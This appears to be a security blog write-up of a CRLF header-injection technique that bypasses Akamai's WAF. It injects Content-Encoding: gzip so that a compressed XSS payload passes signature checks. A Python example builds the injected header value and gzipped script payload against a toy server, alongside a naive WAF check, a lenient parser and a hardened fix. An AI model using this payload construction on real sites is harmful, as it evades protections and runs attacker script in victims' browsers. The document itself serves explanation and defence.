Using CRLF Injection to Bypass a Web App Firewall

We discussed this vulnerability during Episode 191 on 27 February 2023

The vulnerability here isn’t too interesting, just a case of user input being reflected into a response header without sanitizing newlines (CRLF injection). What is interesting is how the researcher leveraged this header-injection primitive to bypass Akamai’s web application firewall.

First, Akamai blocked any \r\n in the request URL, so a bare \n was used instead. A lone newline does not conform to the HTTP spec and may not work in every case, but many HTTP processors (browsers included) are reasonably permissive in parsing. With only \n they could still follow the typical technique of injecting \n\n<XSS payload here>, terminating the headers and placing the XSS payload in the response body.

That approach still has to get the XSS payload itself past the Akamai WAF. Rather than trying to craft a payload that evades the WAF’s signatures, the Praetorian researcher used the header injection to add a Content-Encoding: gzip header. This let them send the payload compressed: the WAF inspects the raw bytes and sees nothing it recognizes as a script, but when the payload is reflected back as the body of the response the browser decompresses it and renders it.

They also had to inject Content-Type and Content-Length headers with appropriate values so the response would be treated as HTML and any extra data sent after the payload (the remainder of the server’s own response) would be ignored by the browser.
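The full chain described above, as an added Python example that is not from the original writeup or from Praetorian: a toy server reflects a value into a header without sanitizing newlines, the injected value carries Content-Encoding, Content-Type and Content-Length plus a gzip-compressed payload, and a lenient header parser standing in for the browser shows why the result executes while a naive signature check over the raw response sees nothing. The server, the header name (Location), the "WAF" check and the parser are all assumptions made for illustration; the example starts from the already URL-decoded value, since in the real attack the \n bytes and gzip bytes would be percent-encoded in the request URL.

```python
import gzip
import re

# Constructed payload for the example.
XSS = b"<script>alert(document.domain)</script>"


def build_injected_value(xss: bytes) -> bytes:
    """Build the value to reflect into a header.

    Bare \n line endings are used because the WAF in the writeup blocked
    \r\n in the URL. The payload is gzip-compressed and the injected
    Content-Length covers exactly the compressed bytes, so the browser
    ignores whatever the server appends after it.
    """
    body = gzip.compress(xss, mtime=0)
    return (
        b"x\n"                                   # finishes the original header value
        b"Content-Encoding: gzip\n"
        b"Content-Type: text/html\n"
        b"Content-Length: " + str(len(body)).encode() + b"\n"
        b"\n" + body                             # blank line ends headers
    )


def vulnerable_server(value: bytes) -> bytes:
    """Hypothetical server that reflects `value` into a header unsanitized."""
    return (
        b"HTTP/1.1 302 Found\r\n"
        b"Location: /search?lang=" + value + b"\r\n"
        b"Server: example\r\n"
        b"\r\n"
        b"<html>real body, never rendered by the client</html>"
    )


def hardened_server(value: bytes) -> bytes:
    """Same server with the fix: refuse CR/LF in anything that lands in a header."""
    if re.search(rb"[\r\n]", value):
        raise ValueError("newline in header value")
    return vulnerable_server(value)


def naive_waf_blocks(raw: bytes) -> bool:
    """Stand-in for a signature check over the raw response stream."""
    return b"<script" in raw.lower()


def parse_like_a_browser(raw: bytes):
    """Lenient parse: accepts bare \n line endings, honors the first
    Content-Length seen, and decompresses according to Content-Encoding."""
    headers = {}
    end = raw.index(b"\n")
    status = raw[:end].rstrip(b"\r")
    pos = end + 1
    while True:
        end = raw.index(b"\n", pos)
        line = raw[pos:end].rstrip(b"\r")
        pos = end + 1
        if line == b"":          # first blank line (\n\n or \r\n\r\n) ends the headers
            break
        name, _, val = line.partition(b":")
        headers.setdefault(name.strip().lower(), val.strip())
    body = raw[pos:]
    if b"content-length" in headers:
        body = body[: int(headers[b"content-length"])]   # trailing server data dropped
    if headers.get(b"content-encoding") == b"gzip":
        body = gzip.decompress(body)
    return status, headers, body


def demo():
    value = build_injected_value(XSS)
    raw = vulnerable_server(value)
    status, headers, body = parse_like_a_browser(raw)
    return {
        "waf_blocks_plain": naive_waf_blocks(vulnerable_server(b"x\n\n" + XSS)),
        "waf_blocks_gzip": naive_waf_blocks(raw),
        "content_type": headers.get(b"content-type"),
        "rendered_body": body,
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, v)
```

The plain \n\n<XSS> variant trips the signature check, the gzip variant does not, and the browser-side parse still yields the original script with a text/html content type. The hardened server shows the actual fix: reject or strip CR and LF before anything user-controlled reaches a header.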